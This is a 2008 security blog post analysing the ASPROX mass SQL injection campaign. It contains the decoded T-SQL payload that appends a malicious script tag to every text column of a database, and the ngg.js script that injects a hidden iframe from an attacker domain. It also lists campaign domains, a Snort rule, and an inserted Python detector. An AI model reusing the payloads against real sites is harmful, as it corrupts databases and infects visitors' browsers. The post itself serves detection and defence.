Monday, July 7, 2008

ASPROX Payload Morphed NGG.JS

New domains have been found, and a new JavaScript payload, "ngg.js", has replaced the previous "b.js".

And it doesn't seem to be wasting any time:
http://www.google.com/search?q=ngg.js
Results 1 - 10 of about 19,300 for ngg.js. (0.03 seconds)

New SQL Injection Payload (HEX DECODED):

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
  SELECT a.name,b.name FROM sysobjects a,syscolumns b
  WHERE a.id=b.id AND a.xtype='u'
    -- xtype 99/35/231/167 = ntext/text/nvarchar/varchar columns of every user table
    AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  -- append the script tag to the existing value of each matching column
  EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.apidad.com/ngg.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
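The payload above is shown after hex decoding; what actually hits the web server is a query string carrying the T-SQL as a hex blob. The following Python detector is an added example, not code from the post or from Sentinel IPS: it pulls hex blobs out of a logged query string, decodes them, and flags the sysobjects/syscolumns cursor plus injected script src pattern. The CAST(0x... AS VARCHAR)/EXEC wrapper it parses is an assumption about the delivery format, and the sample query is constructed here from the decoded payload above.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical detector (not from the post); the CAST(0x... AS [N]VARCHAR)
# wrapper is the assumed delivery form of the hex-encoded payload.
CAST_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script\s+src=([^\s>]+)", re.IGNORECASE)

def decode_hex_casts(query_string):
    """Return every T-SQL string hidden inside CAST(0x...) in a logged query string."""
    qs = unquote_plus(query_string)          # undo %20 and '+' URL encoding
    payloads = []
    for hexblob, n_prefix in CAST_RE.findall(qs):
        raw = bytes.fromhex(hexblob)
        # NVARCHAR hex is UTF-16LE; plain VARCHAR hex is one byte per character
        payloads.append(raw.decode("utf-16-le" if n_prefix else "latin-1"))
    return payloads

def classify(sql):
    """Flag the ASPROX mass-update pattern and extract the injected script URL."""
    upper = sql.upper()
    mass_update = all(k in upper for k in ("SYSOBJECTS", "SYSCOLUMNS", "CURSOR", "UPDATE"))
    m = SCRIPT_RE.search(sql)
    return {"asprox_like": mass_update and m is not None,
            "script_src": m.group(1) if m else None}

def scan_query(query_string):
    """One finding per decoded CAST blob found in the query string."""
    return [classify(p) for p in decode_hex_casts(query_string)]

# Constructed sample: the decoded payload from the post (abridged), re-wrapped
# the way the hex form would appear in a web server log.
DECODED = ("DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR "
           "SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id "
           "AND a.xtype='u' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
           "WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']="
           "RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.apidad.com/"
           "ngg.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END")

def make_sample_query(sql, nvarchar=False):
    """Wrap T-SQL in the assumed CAST/EXEC delivery format (demo input only)."""
    kind = "NVARCHAR" if nvarchar else "VARCHAR"
    blob = sql.encode("utf-16-le" if nvarchar else "latin-1").hex().upper()
    return "id=1;DECLARE @S %s(4000);SET @S=CAST(0x%s AS %s(4000));EXEC(@S);--" % (kind, blob, kind)

if __name__ == "__main__":
    for finding in scan_query(make_sample_query(DECODED)):
        print(finding)  # {'asprox_like': True, 'script_src': 'http://www.apidad.com/ngg.js'}
```

Pointing scan_query at the cs-uri-query field of each IIS log line gives the injected script host per request, which is also the domain to add to the block list.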

What's in ngg.js? The familiar iframe attack from before, but this time it selectively ignores browsers from Russia, Ukraine, China, Korea, Vietnam and India. Lovely :)

window.status = "";
n = navigator.userLanguage.toUpperCase();
// Skip visitors whose browser language matches any of these codes
if ((n != "ZH-CN") && (n != "UR") && (n != "RU") && (n != "KO") && (n != "ZH-TW") && (n != "ZH") && (n != "HI") && (n != "TH") && (n != "UR") && (n != "VI")) {
  var cookieString = document.cookie;
  var start = cookieString.indexOf("updngg=");
  // Only inject once every 11 hours, tracked with the "updngg" cookie
  if (start != -1) {} else {
    var expires = new Date();
    expires.setTime(expires.getTime() + 11*3600*1000);
    document.cookie = "updngg=update;expires=" + expires.toGMTString();
    try {
      document.write("<iframe src=http://mainbvd.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
    } catch (e) {
    }
  }
}

New ASPROX domains spotted:
apidad.com, mainbvd.com, bnrbtch.com, ucomddv.com, brsadd.com, asodbr.com, canclvr.com, portwbr.com, catdbw.mobi, allocbn.mobi, testwvr.com, stiwdd.com, adwadb.mobi, dbgbron.com, ktrcom.com, hiwowpp.cn, clrbbd.com, browsad.com, blockkd.com, bnradd.mobi, bnrbase.com, adbtch.com, aladbnr.com, aladbnr.com, loctenv.com, bnrbasead.com, appdad.com, blcadw.com, destbnp.com, attadd.com, nopcls.com, ausbnr.com, bkpadd.mobi, tctcow.com, ausadd.com, movaddw.com, cliprts.com

Snort signature to detect access of infected site:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ASPROX Infected Site - ngg.js Request"; flow:established,to_server; uricontent:"/ngg.js"; classtype:trojan-activity; reference:url,infosec20.blogspot.com/; rev:1; sid:4000002;)

And finally, go here to download Sentinel IPS' ASPROX Information Toolkit.
